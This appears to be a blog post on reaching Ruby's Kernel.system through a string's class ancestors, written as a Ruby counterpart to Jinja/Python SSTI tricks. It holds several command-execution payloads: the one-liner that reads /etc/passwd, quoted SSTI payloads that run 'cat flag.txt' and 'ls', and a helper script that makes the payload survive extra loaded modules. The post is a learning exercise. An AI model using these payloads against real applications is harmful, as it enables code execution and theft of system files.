Using Ruby ancestors to Execute Code via the String class

tldr/oneliner

ruby -e '"".class.ancestors[3].system("cat /etc/passwd")'

Why?

So I was doing a bit of reading on SSTI, specifically that of Jinja/python which looks like this:

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

For an explanation of how these work in Python, I recommend checking out this writeup. Essentially, it made me wonder whether you could do the same thing in Ruby, and you definitely can (at least the part about reaching other methods by walking an object's class hierarchy). No pwnz yet from me (though I can't be the first to think of this, so it may be a nothingburger, or just a cool trick).

How it works

In Ruby, you would start by declaring a string:

somestring = "a string"

That creates an instance of the String class, so it has access to every method String defines. String also has ancestors: the classes and modules Ruby searches, in order, when it looks up a method on the object. You can list them like so:

somestring = "a string"
puts somestring.class.ancestors

When you run that, you should see the output:

String
Comparable
Object
Kernel
BasicObject

This is the array of classes and modules in String's method lookup chain (Comparable and Kernel are modules, the other three are classes). Since it is an ordinary Array, you can index into it:

somestring = "a string"
puts somestring.class.ancestors[3]

When you run that, you should see the output:

Kernel

We are now holding the Kernel module itself, which has some pretty interesting methods. The most interesting to me is system, which executes an arbitrary shell command. Calling it on the module works because system is a module_function: it is a private instance method on every object (so "".system(...) raises NoMethodError), but a public singleton method on Kernel. One caveat: index 3 is only correct on a bare interpreter. Anything that mixes extra modules into String or Object (ActiveSupport in a Rails app, for example) shifts Kernel's position in the array, so outside a ruby -e demo it is safer to pick the ancestor by name rather than by index.

somestring = "a string"
somestring.class.ancestors[3].system("cat /etc/passwd")
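The following is an added example, not code from the original post. It reaches Kernel from a string literal the same way the one-liner does, but looks the module up by name rather than by position, shows why "".system fails while Kernel.system works, and demonstrates how mixing a module into String moves Kernel's index. The helper names (ancestor_names, find_ancestor, and so on) are my own; the shell commands used (echo, exit) assume a POSIX /bin/sh.

```ruby
# Added example, not from the original post: reach Kernel from a string
# literal without relying on the hard-coded ancestors[3] index.

# Names of everything in the receiver's method-lookup chain, in order.
# Comparable and Kernel are modules; String, Object and BasicObject are classes.
def ancestor_names(obj)
  obj.class.ancestors.map(&:name)
end

# Position of Kernel in the chain. On a stock interpreter this is 3, but any
# library that includes a module into String or Object shifts it.
def kernel_index(obj = "")
  obj.class.ancestors.index(Kernel)
end

# Look the module up by name instead of hard-coding ancestors[3].
def find_ancestor(obj, wanted)
  obj.class.ancestors.find { |a| a.name == wanted }
end

# Kernel#system is a module_function: private as an instance method on every
# object, public as a singleton method on the Kernel module. respond_to? sees
# only public methods, so it is false for "" and true for Kernel.
def system_callable?(receiver)
  receiver.respond_to?(:system)
end

# Run a shell command through the Kernel module reached from a string literal.
# Returns true/false for the exit status, exactly like Kernel#system.
def system_via_ancestors(cmd)
  find_ancestor("", "Kernel").system(cmd)
end

# Same path, but capture stdout with Kernel's backtick method, which is also a
# module_function and therefore callable on the module itself.
def capture_via_ancestors(cmd)
  find_ancestor("", "Kernel").public_send(:`, cmd)
end

# Include an empty anonymous module into String and return Kernel's new index.
# This mimics a library that reopens String, and is why the one-liner's [3]
# can point at Object (whose system is private) instead of Kernel.
def shift_kernel_index
  String.include(Module.new) # inserted directly after String in the chain
  kernel_index
end

if __FILE__ == $PROGRAM_NAME
  puts ancestor_names("").join(" < ")
  puts "Kernel is at index #{kernel_index}"
  puts "\"\".respond_to?(:system) => #{system_callable?('')}"
  puts "Kernel.respond_to?(:system) => #{system_callable?(Kernel)}"
  print capture_via_ancestors("echo reached Kernel via ancestors")
  puts "after a mixin, Kernel moves to index #{shift_kernel_index}"
  puts "by name it is still found: #{find_ancestor('', 'Kernel')}"
end
```

Looking the module up with find { |a| a.name == "Kernel" } is what makes the trick survive in a process that has ActiveSupport or similar loaded; an index-based payload silently lands on Object there and raises NoMethodError because system is private on it.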

PoC

[Demo: recording of the one-liner running; image not included in this text]

So, just a fun learning experience for me on how you can access things in unique ways in Ruby!
